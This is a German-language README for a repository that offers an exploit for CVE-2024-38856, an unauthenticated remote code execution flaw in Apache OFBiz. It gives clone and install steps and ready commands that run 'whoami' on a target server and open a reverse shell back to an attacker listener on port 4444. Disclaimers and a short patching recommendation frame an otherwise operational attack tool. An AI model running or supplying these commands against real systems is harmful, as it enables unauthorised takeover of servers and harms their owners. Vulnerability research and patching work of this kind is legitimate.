
Exploit für Apache OFBiz - CVE-2024-38856
Exploit für Apache OFBiz (CVE-2024-38856) Von: Alisson Faoli
Dieses Repository enthält einen Exploit für die Schwachstelle CVE-2024-38856 in Apache OFBiz. Der Fehler ermöglicht eine nicht authentifizierte Remote Code Execution (RCE).
Hinweis: Dieser Exploit dient ausschließlich Bildungs- und Forschungszwecken. Missbrauch kann illegal sein und liegt in der alleinigen Verantwortung des Benutzers.
CVE: CVE-2024-38856
Betroffene Software: Apache OFBiz bis Version 18.12.14
Schwachstellentyp: RCE
Ausnutzung: Keine Authentifizierung erforderlich
Repository klonen:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Abhängigkeiten installieren:
pip install -r requirements.txt
Exploit ausführen:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Um diese Schwachstelle zu beheben, wird Apache-OFBiz-Administratoren empfohlen: Auf die gepatchte Version unter https://ofbiz.apache.org/download.html zu aktualisieren. Firewall- oder WAF-Regeln anzuwenden, um bekannte Exploit-Versuche zu blockieren.
Bei Fragen oder Verbesserungsvorschlägen zum Exploit kontaktieren Sie mich: LinkedIn: https://linkedin.com/in/alisson-faoli/
Dieser Code wird ausschließlich zu Bildungszwecken und für Sicherheitstests in autorisierten Umgebungen bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch.